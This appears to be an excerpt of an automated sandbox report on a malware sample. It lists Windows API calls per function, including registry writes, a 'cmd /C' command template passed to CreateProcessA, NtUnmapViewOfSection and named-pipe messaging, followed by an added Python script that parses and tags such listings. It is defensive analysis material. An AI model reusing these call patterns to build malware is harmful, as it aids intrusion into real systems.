  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
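The per-function listings above are where the sample's behaviour is actually visible, but at this size they are only practical to read by machine: the function at 01B34B26 (second code region 01B31000 of the same process) opens a file with access C0000000 and disposition 00000004 and writes 0x1000-byte chunks to it, the function at 001C2A5A reaches CreateDirectoryW, a ".dll" literal, "DllRegisterServer" and RegOpenKeyA(80000001, ...) through its subcalls, and the function at 001CBDFD sends a 0x119-byte message over a named pipe. The script below is an added example for this page, not Joe Sandbox's code and not the analysed sample's: it parses this listing format, decodes the numeric CreateFile and RegOpenKey arguments into their named constants, and tags each function with heuristics of my own. It assumes a record is its Similarity block followed by APIs and Memory Dump Source, the order the entries above follow, and that argument values are the analyzer's reconstruction (dumps are "based on PE: false" and "?" marks an unknown), so a decoded flag is a lead to confirm in the dump, not proof. SAMPLE is a trimmed excerpt copied from entries above.

```python
"""Triage helper for per-function API listings in the format above (added example
for this page, not Joe Sandbox code and not the sample's code). A record is read as
its 'Similarity' block followed by 'APIs' and 'Memory Dump Source', the order the
entries above follow; argument values are the analyzer's reconstruction ('?' means
unknown), so decoded flags are hints, not proof. SAMPLE is a trimmed excerpt copied
from entries above."""
import re

SAMPLE = """Similarity
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
APIs
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
"""

CALL_RE = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<api>\w+)\."
                     r"(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}


def hexarg(args, i):
    """args[i] as an int, or None when the slot is missing or unknown ('?')."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def decode_create_file(args):
    """CreateFileA/W(name, access, share, sa, disposition, flags, template) -> (access, disposition)."""
    access, disp = hexarg(args, 1), hexarg(args, 4)
    names = [n for bit, n in GENERIC.items() if access is not None and access & bit]
    return "|".join(names) or "?", DISPOSITION.get(disp, "?")


def parse(text):
    """Split the listing into function records (similarity fields, calls, memory region)."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings", "Memory Dump Source", "Similarity"):
            section = line
            if section == "Similarity":  # each function record opens with its Similarity block
                rec = {"sim": {}, "calls": [], "region": "?"}
                records.append(rec)
            continue
        if rec is None or not line:  # blank line, or the excerpt began mid-record
            continue
        body = line.lstrip("•").strip()
        if section == "Similarity":
            key, _, value = body.partition(":")
            rec["sim"][key.strip()] = value.strip()
        elif section == "Memory Dump Source" and (m := re.search(r"Offset: ([0-9A-F]+)", body)):
            rec["region"] = m.group(1)
        elif section == "APIs" and (m := CALL_RE.match(body)):
            call = m.groupdict()  # 'sub' holds the callee address on 'Part of subcall' lines
            call["args"] = [a.strip() for a in call["args"].split(",")] if call["args"] else []
            rec["calls"].append(call)
    return records


def triage(rec):
    """Behaviour tags (my own heuristics) from direct and subcall APIs plus string literals."""
    apis = {c["api"] for c in rec["calls"]}
    literals = {a for c in rec["calls"] for a in c["args"]} | set(filter(None, rec["sim"].get("String ID", "").split("$")))
    tags = []
    for c in rec["calls"]:
        if c["api"] in ("CreateFileA", "CreateFileW"):
            access, disp = decode_create_file(c["args"])
            if "GENERIC_WRITE" in access and apis & {"WriteFile", "SetEndOfFile"}:
                tags.append(f"writes a file ({access}, {disp})")
        elif c["api"] in ("RegOpenKeyA", "RegOpenKeyExA") and hexarg(c["args"], 0) in HIVES:
            tags.append(f"opens {HIVES[hexarg(c['args'], 0)]} key")
    if "CallNamedPipeA" in apis:
        tags.append("named-pipe IPC")
    if "DllRegisterServer" in literals:
        tags.append("references DllRegisterServer (DLL registration)")
    return tags


if __name__ == "__main__":
    for rec in parse(SAMPLE):
        print(rec["region"], rec["sim"].get("API ID", ""), "->", "; ".join(triage(rec)) or "-")
```

Run it over the full extracted report text instead of SAMPLE to get one line per function; the region column separates the 001C1000 code from the 01B31000 code in the same process, which is what distinguishes the file-writing routine at 01B34B26 from everything else listed here. The tag rules are deliberately few; the subcall lists above suggest the next ones a triage pass would want, such as NtUnmapViewOfSection at 001DBF67 and the GetDriveTypeW/FindFirstFileW enumeration under 001C7186, and each new rule should key on the API names and argument constants exactly as they appear in the listing.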
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
